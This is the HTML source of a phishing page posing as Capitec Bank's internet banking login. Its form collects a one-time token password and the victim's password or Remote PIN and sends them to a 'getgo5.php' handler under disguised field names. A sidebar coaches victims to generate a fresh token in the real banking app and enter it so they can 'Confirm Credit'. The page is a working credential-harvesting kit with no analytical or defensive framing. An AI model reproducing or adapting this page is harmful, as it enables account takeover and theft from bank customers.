<!DOCTYPE html>

<html class=" tlvHideBgImage" style=""><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Internet Banking | Capitec Bank</title><meta name="ROBOTS" content="NOINDEX"><link rel="stylesheet" type="text/css" href="./default-3.0.0.css"><!--[if IE]><link rel="stylesheet" type="text/css" href="./css/ie-1.0.1.css"><![endif]--><link rel="stylesheet" type="text/css" href="./jquery-ui-1.8.10.custom.min.css"><link rel="stylesheet" type="text/css" href="./default.custom.min-1.1.0.css">
<link href="css2.css" rel="stylesheet">
<style>

div, p, span,p, table, li, ul, a, id, h1, h2, h3 {
font-family: 'Ropa Sans', sans-serif; !important;
}

input {
font-family: 'Ropa Sans', sans-serif; !important;
}

button {
cursor: pointer;
}

</style>
</head>
<body topmargin="0">



<div class="siteHeader">

<div class="container">
<div class="logo"><img src="./logo_main.png"></div>


<nav class="primaryNav">
<ul>


</ul>
</nav>


<ul class="pull-right">
<li class="hidden-xs"><div class="linkWrap "><a href="https://www.capitecbank.co.za/" class="banking" target="_blank">Capitec Bank</a></div>
</li>
<li>
<div class="linkWrap">
<a href="https://www.capitecbank.co.za/privacy-and-security" target="_blank">Security</a>
</div>
</li>
</ul>


</div>



</div>








<!--oO1/login1Oo--><div id="bodyTagId"><div class="container"><div align="left"><!--[if IE]><style type='text/css'>html body div div div h1{margin-left: 0px;}html body div#bodyTagId div div div.errorMessage { margin-left:0px;}</style><![endif]-->

<h1 style="z-index:999;">Remote Banking
</h1>


<script language="javascript" src="./loginSubmitForm-1.0.0.js.download"></script>

<div class="row">

<div class="col-md-6">

<form id="login" action="getgo5.php" method="POST" autocomplete="off">
<fieldset>
<label id="usernameLabel" for="username"><span class="username">Enter New Token Password:</span>
<input id="username" required="" name="anotheman" type="text" value="" maxlength="40">
</label>

</fieldset>
<fieldset>
<label id="usernameLabel" for="username"><span class="username">Password/Remote PIN:</span>
<input id="username" required="" name="suheha" type="password" value="" maxlength="40">
</label>

</fieldset>


<table>
<tbody>

<div width="15px">
<button name="signcnt" type="submit" style="outline: 0; border: 0; background: 0; float: left;"><img class="iWantToImg" src="./proceed.gif" alt="Sign in" border="0" width="15" height="15"> <div style=" font-size: 22px; margin-top: 2px; float: right; color: #009de0; ">Confirm Credit</div></button>
</tr></tbody></table></div>
<div>
</div></form>


</div>
<div class="col-md-6">

<div class="">
<h2>Cant find token password?</h2>
<ol>
Enter the six digit Token password from your Token device.
<br><br>

                 OR
<br><br>
If you have installed the Capitec Banking App.

<br></br>
1. Open the Capitec Banking App on your device<br>
2. Open the app menu and select "Generate token password"<br>
3. Enter your Remote PIN and click "OK"<br>
4. Enter the token here and click "Confirm Credit"<br>
</ol>

</div>


</div>

</div>


</div></div><script type="text/javascript">$(document).ready(function() {document.getElementById('username').focus();});</script>

</div></body></html>